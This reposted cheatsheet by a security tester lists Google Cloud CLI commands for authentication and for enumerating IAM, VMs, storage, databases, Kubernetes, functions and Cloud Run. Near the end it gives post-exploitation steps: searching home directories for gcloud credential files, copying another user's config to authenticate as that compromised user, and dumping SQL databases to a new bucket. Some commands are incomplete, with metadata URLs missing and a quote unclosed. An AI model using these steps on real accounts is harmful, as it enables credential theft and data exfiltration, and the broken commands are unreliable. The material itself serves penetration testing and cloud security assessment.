
Google Cloud Platform CLI Tool Cheatsheet

Apr 19th, 2022
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Google Cloud Platform CLI Tool Cheatsheet

By Beau Bullock (@dafthack)


Authentication with gcloud

#user identity login
gcloud auth login

#service account login
gcloud auth activate-service-account --key-file creds.json

List accounts available to gcloud

gcloud auth list

Account Information

Get account information

gcloud config list

List organizations

gcloud organizations list

Enumerate IAM policies set ORG-wide

gcloud organizations get-iam-policy <org ID>

Enumerate IAM policies set per project

gcloud projects get-iam-policy <project ID>

List projects

gcloud projects list

Set a different project

gcloud config set project <project name> 

Gives a list of all APIs that are enabled in project

gcloud services list

Get source code repos available to user

gcloud source repos list

Clone repo to home dir

gcloud source repos clone <repo_name>

Virtual Machines

List compute instances

gcloud compute instances list

Get shell access to instance

gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"

Puts public ssh key onto metadata service for project

gcloud compute ssh <local host>

Get access scopes if on an instance

curl -H &#39;Metadata-Flavor:Google’

Use Google keyring to decrypt encrypted data

gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key <crypto-key> --keyring <crypto-keyring> --location global

Storage Buckets

List Google Storage buckets

gsutil ls

List Google Storage buckets recursively

gsutil ls -r gs://<bucket name>

Copy item from bucket

gsutil cp gs://bucketid/item ~/

Webapps & SQL

List WebApps

gcloud app instances list

List SQL instances

gcloud sql instances list
gcloud spanner instances list
gcloud bigtable instances list

List SQL databases

gcloud sql databases list --instance <instance ID>
gcloud spanner databases list --instance <instance name>

Export SQL databases and buckets

First copy buckets to local directory

gsutil cp gs://bucket-name/folder/ .

Create a new storage bucket, change perms, export SQL DB

gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>


List networks

gcloud compute networks list

List subnets

gcloud compute networks subnets list

List VPN tunnels

gcloud compute vpn-tunnels list

List Interconnects (VPN)

gcloud compute interconnects list


gcloud container clusters list

GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with gcloud and run:

gcloud container clusters get-credentials <cluster name> --region <region>

If successful and the user has the correct permission the Kubernetes command below can be used to get cluster info:

kubectl cluster-info


GCP functions log analysis – May get useful information from logs associated with GCP functions

gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>

GCP Cloud Run analysis – May get useful information from descriptions such as environment variables.

gcloud run services list
gcloud run services describe <service-name>
gcloud run revisions describe --region=<region> <revision-name>

Gcloud stores creds in ~/.config/gcloud/credentials.db
Search home directories

sudo find /home -name "credentials.db

Copy gcloud dir to your own home directory to auth as the compromised user

sudo cp -r /home/username/.config/gcloud ~/.config
sudo chown -R currentuser:currentuser ~/.config/gcloud
gcloud auth list

Metadata Service URL

curl "" -H "Metadata-Flavor: Google"
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